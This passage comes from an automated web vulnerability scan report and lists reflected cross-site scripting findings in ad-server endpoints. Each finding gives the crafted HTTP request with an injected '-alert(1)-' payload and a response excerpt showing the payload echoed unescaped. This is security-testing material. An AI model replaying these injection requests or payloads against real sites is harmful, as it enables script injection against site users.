be=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=6e0da"-alert(1)-"8fdfe6c6257http://rbc.bridgetrack.com/bank/_redir.htm?BTData=6021A7B776679675D54424BB7A2A5AFA09C9D9F81FEFBF8F3F4C2AE0B149&BT_TRF=11030&ASC=AD0033");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

2.12. http://vulnerable.verizon.host/adi/N3995.275551.SYMPATICOCANADA/B5002719 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N3995.275551.SYMPATICOCANADA/B5002719

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f2d6"-alert(1)-"3d73acd9ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3995.275551.SYMPATICOCANADA/B5002719;sz=300x250;ord=181825700?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=&7f2d6"-alert(1)-"3d73acd9ef9=1 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6687

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=&7f2d6"-alert(1)-"3d73acd9ef9=1http%3a%2f%2fwww.hotels.ca/hotel-deals/SLMcoupon_mms-444");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWi
...[SNIP]...

2.13. http://vulnerable.verizon.host/adi/N3995.275551.SYMPATICOCANADA/B5002719 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N3995.275551.SYMPATICOCANADA/B5002719

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d262"-alert(1)-"96f8deb7f41 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3995.275551.SYMPATICOCANADA/B5002719;sz=300x250;ord=181825700?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=4d262"-alert(1)-"96f8deb7f41 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6657

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
e=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=4d262"-alert(1)-"96f8deb7f41http://www.hotels.ca/hotel-deals/SLMcoupon_mms-444");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "
...[SNIP]...

2.14. http://vulnerable.verizon.host/adi/N6080.149339.8804879051621/B4137193.79 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N6080.149339.8804879051621/B4137193.79

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aec59"-alert(1)-"5a20f033947 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6080.149339.8804879051621/B4137193.79;sz=180x150;ord=101273807?click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=&aec59"-alert(1)-"5a20f033947=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://redcated/APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 19 Nov 2010 23:27:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6742

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=&aec59"-alert(1)-"5a20f033947=1http%3a%2f%2flp.21st.com/sp/%3Fpid%3D10486EYBDWK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "
...[SNIP]...

2.15. http://vulnerable.verizon.host/adi/N6080.149339.8804879051621/B4137193.79 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N6080.149339.8804879051621/B4137193.79

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c1c1"-alert(1)-"afd3afa7698 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6080.149339.8804879051621/B4137193.79;sz=180x150;ord=101273807?click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=9c1c1"-alert(1)-"afd3afa7698 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://redcated/APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 19 Nov 2010 23:26:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6714

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=9c1c1"-alert(1)-"afd3afa7698http://lp.21st.com/sp/?pid=10486EYBDWK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var
...[SNIP]...

2.16. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4db8c'-alert(1)-'76a9a340a18 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.54db8c'-alert(1)-'76a9a340a18&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:53:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.54db8c'-alert(1)-'76a9a340a18&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.17. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85571'-alert(1)-'e0c602a890c was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt185571'-alert(1)-'e0c602a890c&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:52:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt185571'-alert(1)-'e0c602a890c&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.18. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87d7b'-alert(1)-'549109f08e8 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=87d7b'-alert(1)-'549109f08e8 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:54:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
age=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=87d7b'-alert(1)-'549109f08e8http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.19. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a860'-alert(1)-'40e767fbc22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=&6a860'-alert(1)-'40e767fbc22=1 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:55:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 688

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/126/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
ge=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=&6a860'-alert(1)-'40e767fbc22=1http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.20. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f99'-alert(1)-'151cd29a63c was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html18f99'-alert(1)-'151cd29a63c&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:52:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html18f99'-alert(1)-'151cd29a63c&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/pro
...[SNIP]...

2.21. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b0aa'-alert(1)-'df99fff59 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto2b0aa'-alert(1)-'df99fff59&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:51:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 683

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/121/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto2b0aa'-alert(1)-'df99fff59&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865c
...[SNIP]...

2.22. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

